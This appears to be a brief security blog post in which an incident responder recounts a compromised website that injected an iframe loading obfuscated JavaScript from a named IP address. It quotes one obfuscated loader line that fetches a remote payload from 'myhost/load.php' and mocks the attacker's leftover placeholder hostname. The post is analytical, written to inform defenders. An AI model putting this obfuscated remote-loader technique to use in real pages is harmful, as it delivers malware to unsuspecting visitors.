Nothing quite brings a smile to my face like when a script kiddie isn't quite smart enough to figure out the already highly automated tools they have at their disposal. A great reference is a recent hit of ours. It started out like any other minor incident, a user was browsing a website that was a victim of some sort of attack. This attack then snuck an iframe into the HTML and referenced to a .js file at "123.231.102.209" (which by the way if your running, you might want to make sure you're not compromised). The file was pretty heavily obfuscated with the usual string replacement style (show below). However, my favorite part of it was the following:
NknOUUaTGunmGbyZiIFLV.open("3vZVKO9ZLFz6PqIl9Uxisuv5Y0BhoMET".replace(/3vZVKO9ZLFz6PqIl9Uxisuv5Y0BhoM/ig, "G"),'http://myhost/load.php?bof',false);
Which opens the following URL http://myhost/load.php?bof, but the thing to note here... In whatever automation software the attacker was using they forgot to put something slightly more useful to them, and something slightly less hilarious to me, than "myhost" as the hostname.
Just further proof that while there is some good talent out there, there really is a lot to be desired.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment